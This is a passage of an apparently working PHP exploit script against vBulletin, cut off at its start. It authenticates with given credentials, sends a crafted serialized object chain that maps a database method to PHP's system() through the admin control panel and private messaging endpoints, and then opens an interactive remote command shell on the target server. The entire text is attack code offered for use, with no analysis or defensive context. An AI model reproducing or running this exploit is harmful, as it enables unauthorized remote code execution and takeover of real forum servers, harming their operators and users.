\n"; print "\nExample....: php $argv[0] http://localhost/vb4/ egix password"; print "\nExample....: php $argv[0] https://vbulletin.com/ hacker pwned\n\n"; die(); } class vB_Database { public $functions = array("free_result" => "system"); } class vB_dB_Result { protected $db, $recordset; function __construct($cmd) { $this->db = new vB_Database; $this->recordset = $cmd; } } class vB_Route_Error { protected $_segment_scheme, $_validated_scheme = true; function __construct($cmd) { $this->_segment_scheme = new vB_dB_Result($cmd); } } function exec_cmd($cmd) { global $ch, $url, $token; $chain = serialize(new vB_Route_Error($cmd)); $chain = base64_encode('O:8:"DateTime":1:{s:4:"date";'.$chain.'}'); curl_setopt($ch, CURLOPT_URL, "{$url}admincp/index.php"); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([$chain => 1])); if (!preg_match('/name="postvars" value="([^"]+)"/', curl_exec($ch), $signed)) die("[-] postvars not found!\n\n"); $params = ["do" => "movepm", "securitytoken" => $token[1], "messageids" => "B64:" . html_entity_decode($signed[1])]; curl_setopt($ch, CURLOPT_URL, "{$url}private.php"); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); return curl_exec($ch); } $url = $argv[1]; $user = $argv[2]; $pwd = $argv[3]; $ch = curl_init(); @unlink("./cookies.txt"); curl_setopt($ch, CURLOPT_URL, "{$url}login.php"); curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["do" => "login", "vb_login_username" => $user, "vb_login_password" => $pwd])); print "\n[+] Performing login with username '{$user}' and password '{$pwd}'\n"; if (!preg_match("/Thank you for logging in/i", curl_exec($ch))) die("[-] Login failed!\n\n"); print "[+] Launching shell\n"; curl_setopt($ch, CURLOPT_URL, "{$url}private.php"); curl_setopt($ch, CURLOPT_POST, false); if (!preg_match('/SECURITYTOKEN = "([^"]+)"/i', curl_exec($ch), $token)) die("[-] SECURITYTOKEN not found!\n\n"); while (1) { print "\nvBulletin-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $cmd .= "; echo _______"; preg_match('/(.*)_______/s', exec_cmd($cmd), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n"); }